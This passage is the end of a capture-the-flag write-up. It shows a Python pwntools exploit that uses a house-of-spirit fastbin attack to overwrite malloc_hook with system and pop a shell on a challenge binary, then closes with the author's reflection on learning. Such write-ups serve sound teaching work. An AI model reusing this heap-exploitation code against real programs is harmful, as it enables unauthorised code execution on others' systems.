    malloc_hook = libc_base + 0x01c09d0
    one_gadget = libc_base + 0xeafab #0xcd3aa, 0xcd3ad, 0xcd3b0, 0xeafab
    system = libc_base + libc.symbols['system']
    log.success("Libc-Base@ 0x{:016x}".format(libc_base))
    log.success("mall-hook@ 0x{:016x}".format(malloc_hook))
    log.success("System@    0x{:016x}".format(system))

    # setup house of spirit
    add([heap_base+0x1640,0,0x71,0,0],cnt=12) # craft Fake chunk and pointer to it
    add([0x21,0x21,0x21,0x21]) # To fulfill nextsize
    delete(625) # Free embedded Fake Fastbin 0x70 size
    delete(0) # Free surrounding bin
    add([0,0,0x71,malloc_hook-35],cnt=12) # Allocate surrounding chunk overwriting fd of fake Fastbin
    add([],cnt=12)# Allocate 0x70 bin (use Fastbin)

    # Overwrite malloc_hook
    system_low    = system & 0x000000FFFFFFFFFF
    system_high   = system & 0xFFFFFF0000000000
    add([0,system_low<<3*8,system_high>>5*8],cnt=12)

    # Call System
    for addr in list(libc.search("sh\x00")):
        if addr % 8==0:
            sh = libc_base + addr
            break
    sh_count = sh//8 - 1
    log.info("Adding a new list with count: {} | sh @ 0x{:016x}".format(sh_count, sh))
    add([],cnt=sh_count)
    sl('id')
    irt()

I hope you enjoyed it, and maybe learned something new. I certainly did. And if there is one thing I once again had to learn: sometimes you fail and bang your head because of the most mundane stuff. And that's fine. Just keep learning until you can solve it. Overall this challenge took me like 10 hours. For most people in this field this may seem way too long, but that's just more reason to keep learning and improving. If you have any questions you can always find me on Twitter.